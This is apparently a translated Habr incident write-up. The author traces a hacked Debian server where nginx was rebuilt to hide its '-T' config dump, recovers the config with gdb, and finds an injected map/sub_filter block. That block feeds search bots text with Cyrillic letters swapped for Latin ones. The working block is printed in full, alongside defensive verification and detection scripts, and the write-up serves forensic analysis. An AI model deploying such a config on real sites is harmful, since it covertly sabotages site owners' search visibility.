When 'а' is not equal to 'a'. In the wake of a hack

An unpleasant story happened to one of my friends. But however unpleasant it was for Mikhail, it was just as entertaining for me.

I should say that my friend is a decent UNIX user: he can install the system himself, mysql and the like, and write simple nginx configs.
And a dozen and a half of his sites are devoted to construction tools.

One of these sites, dedicated to chainsaws, sits firmly at the TOP of the search engines. The site is non-commercial, but someone got into the habit of attacking it. Now a DDoS, now abuse, now they write nasty comments and send complaints to the hosting provider and to RKN.
Suddenly everything went quiet, and this calm turned out to be for the worse: the site began slowly sliding down from the top lines of the search results.


That was the preface, and now the admin's own story.

I was about to go to bed when the phone rang: "San, could you take a look at my server? It feels like I've been hacked; I can't prove it, but the feeling hasn't left me for the third week now. Or maybe it's time for me to get treated for paranoia?"

What followed was half an hour of conversation that can be summarized as follows:

  • the ground for a hack was very fertile;
  • the attacker could have obtained superuser rights;
  • the attack (if it took place) was aimed specifically at this site;
  • the weak spots have been fixed, and we need to find out whether there was an intrusion;
  • the hack could not have affected the site code and the databases.

Regarding the last point.


Only the white (public) IP of the front end faces the world. There is no exchange between the back ends and the front end other than http(s); the users/passwords differ, and no keys were exchanged. On the gray (private) addresses all ports except 80/443 are closed. The white IPs of the back ends are known only to two users whom Mikhail trusts completely.

Debian 9 is installed on the front end, and at the time of the call the system had been isolated from the world by an external firewall and stopped.

"OK, give me access," I decided to put off sleep for an hour. "I'll see for myself."

Here is what we have:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Searching for a possible hack

I start the server, at first in rescue mode. I mount the disks and leaf through them: auth logs, history, system logs and so on; where possible I check file creation dates, although I understand that a "standard" clean-up was done afterwards, and Misha himself "trampled" around a lot while searching.

I begin as usual, not really knowing what to look for, by studying the configs. First of all I am interested in nginx because, basically, there is nothing else on the front end.
The configs are small, neatly laid out in about ten files; I just cat them one by one. Everything seems clean, but you never know whether I missed some include, so let me produce a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't understand: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question is added to the one about the listing: "Why is nginx so old?"

Moreover, the system believes that the latest version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- OK, go to sleep...

nginx has clearly been rebuilt, and the listing output via "-T" is hidden for some reason. There is no more doubt about the hack; one could simply accept it and (since Misha had already replaced the server with a new one) forget about the problem.

And really, once someone has root, the only sensible thing is to reinstall the system, and looking for what exactly is wrong there is pointless; but this time curiosity won over sleep. How can we find out what they wanted to hide from us?
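One check worth running before giving up on a box like this (an added example, not from the original article): compare the installed files against the package's own md5sums manifest, which is what `dpkg --verify nginx` or `debsums -c nginx` do on Debian. The script below reimplements that comparison in Python on a constructed temporary tree, so that a swapped binary shows up as modified; the paths, contents and the "rebuilt" binary are invented for the demo.

```python
"""
Added example (not from the original article): reproduce the check that
`dpkg --verify` / `debsums` perform, using the dpkg md5sums manifest
format (/var/lib/dpkg/info/<pkg>.md5sums: "<md5hex>  <relative path>").
Everything below runs in a temporary directory with constructed files.
"""
import hashlib
import os
import tempfile


def parse_md5sums(text):
    """Parse md5sums lines into {relative_path: md5hex}."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, path = line.partition("  ")
        manifest[path] = digest
    return manifest


def verify_against_manifest(root, manifest):
    """Return {path: status} for every manifest entry that does not match:
    'missing' if the file is absent, 'modified' if its md5 differs."""
    findings = {}
    for rel, expected in manifest.items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            findings[rel] = "missing"
            continue
        with open(full, "rb") as f:
            actual = hashlib.md5(f.read()).hexdigest()
        if actual != expected:
            findings[rel] = "modified"
    return findings


def demo():
    """Constructed scenario: a 'package' ships a binary and a man page, the
    manifest is built from the pristine files, then the binary is replaced
    by a rebuilt one. Returns the findings of the verification."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "usr/sbin/nginx": b"original nginx binary\n",
            "usr/share/man/man8/nginx.8.gz": b"man page\n",
        }
        lines = []
        for rel, data in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
            lines.append(f"{hashlib.md5(data).hexdigest()}  {rel}")
        manifest = parse_md5sums("\n".join(lines))

        # The attacker swaps the binary (hypothetical content for the demo).
        with open(os.path.join(root, "usr/sbin/nginx"), "wb") as f:
            f.write(b"rebuilt nginx with -T disabled\n")

        return verify_against_manifest(root, manifest)


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status}: {path}")
```

The caveat is the same one the article draws: an attacker with root can rewrite /var/lib/dpkg/info/nginx.md5sums just as easily as the binary, so the manifest has to come from a trusted copy of the .deb (or from the distribution's mirror), not from the compromised disk.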

Let's try tracing:

$ strace nginx -T

We look, and the trace contains no lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the outputs.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that this piece of code in src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was reduced to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so that the listing is not printed with "-T".

But how do we see our config?

If my assumption is right and the problem is only in the ngx_dump_config variable, let's try setting it with gdb; luckily the --with-cc-opt='-g ...' flag is present, and I hope the -O2 optimization won't get in our way. At the same time, since I don't know what else may have been done to ngx_dump_config inside case 'T':, we won't go through that block at all, but will set the variable while taking case 't':

Why both '-t' and '-T' can be used: the if (ngx_dump_config) block sits inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

True, if the code was changed in this section rather than in case 'T':, then my approach will not work.

Test nginx.conf

After reproducing the problem on a test bench, it turned out that the malicious nginx needs only a minimal configuration of this form to operate:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We will use it in the article for brevity.

Launching the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint on the main() function
  • start the program
  • change the value of the variable that controls config output: ngx_dump_config=1
  • continue/finish the program

As we can see, the real config differs from ours; let's pick out the parasitic part of it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's see what happens here, in order.

Yandex/Google User-Agents are identified:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are singled out:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for requests that meet both conditions above,

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the HTML text of the affected pages the Cyrillic 'о' is replaced by the Latin 'o' and the Cyrillic 'а' by the Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Right, it's that simple: 'а' != 'a', just as 'о' != 'o':


So the search engine bots, instead of 100% normal Cyrillic text, received rubbish diluted with the Latin 'a' and 'o'. I won't venture to discuss how exactly this affects SEO, but a jumble of letters could hardly have had a positive effect on positions in the search results.
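To make the 'а' != 'a' point concrete, here is an added example (my code, not the article's and not the attacker's) that re-implements the decision the injected map/sub_filter block makes in Python, applies it to a constructed Russian snippet, and then does what a defender would want: fetch the page "as a user" and "as a crawler" and flag words that mix Cyrillic and Latin letters, which real Russian text never contains. The sample HTML, the URIs and the crawler User-Agent are assumptions for the demo; in a real check malicious_filter would be replaced by two HTTP requests to the suspect server.

```python
"""
Added example (not part of the original article): simulate the injected
nginx map/sub_filter logic and detect its effect as mixed-script words.
No network access: the 'bot' and 'user' views are produced in-process.
"""
import re
import unicodedata

CYR_O, CYR_A = "\u043e", "\u0430"   # Cyrillic о and а
LAT_O, LAT_A = "o", "a"             # Latin o and a

# Same patterns as the injected "map $http_user_agent" block.
BOT_UA = re.compile(r"yandex\.com/bots|www\.google\.com/bot\.html", re.I)
WP_URI = re.compile(r"/wp-", re.I)


def malicious_filter(user_agent, uri, body):
    """Reproduce the injected logic: for crawler User-Agents on non-/wp-
    URIs, replace every Cyrillic о/а with Latin o/a (sub_filter_once off).
    Everyone else gets the page untouched."""
    sign_user_agent = 1 if BOT_UA.search(user_agent) else 0
    sign_uri = 1 if WP_URI.search(uri) else 0
    if sign_user_agent == 1 and sign_uri == 0:
        return body.replace(CYR_O, LAT_O).replace(CYR_A, LAT_A)
    return body


WORD = re.compile(r"\w+")


def script_of(ch):
    """'Cyrillic', 'Latin' or None, from the Unicode character name."""
    name = unicodedata.name(ch, "")
    if name.startswith("CYRILLIC"):
        return "Cyrillic"
    if name.startswith("LATIN"):
        return "Latin"
    return None


def mixed_script_words(text):
    """Return the words that contain both Cyrillic and Latin letters."""
    hits = []
    for word in WORD.findall(text):
        scripts = {s for s in map(script_of, word) if s}
        if len(scripts) > 1:
            hits.append(word)
    return hits


# Assumed User-Agents for the demo: a plain browser and Googlebot.
USER_UA = "Mozilla/5.0"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def compare_views(uri, body, user_ua=USER_UA, bot_ua=GOOGLEBOT_UA):
    """Get the page as a user and as a crawler (simulated here) and report
    whether the crawler copy differs and which of its words are mixed-script."""
    user_view = malicious_filter(user_ua, uri, body)
    bot_view = malicious_filter(bot_ua, uri, body)
    return {
        "differs": user_view != bot_view,
        "mixed_words": mixed_script_words(bot_view),
    }


# Constructed sample page text: "Chainsaw for home and dacha" in Russian.
SAMPLE_HTML = "<p>Бензопила для дома и дачи</p>"

if __name__ == "__main__":
    print(compare_views("/chainsaws/", SAMPLE_HTML))   # crawler copy is altered
    print(compare_views("/wp-admin/", SAMPLE_HTML))    # /wp- pages are left alone
```

Fetching a page twice with different User-Agents and diffing the bodies is a cheap cloaking check that catches this whole family of tricks, whatever the substituted letters are; the mixed-script test then tells you where in the text the substitution happened.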

What can I say: inventive guys.

References

Debugging with GDB
gdb(1) — Linux man page
strace(1) — Linux man page
Nginx - Module ngx_http_sub_module
On bars, chains and electric saws

Source: www.habr.com
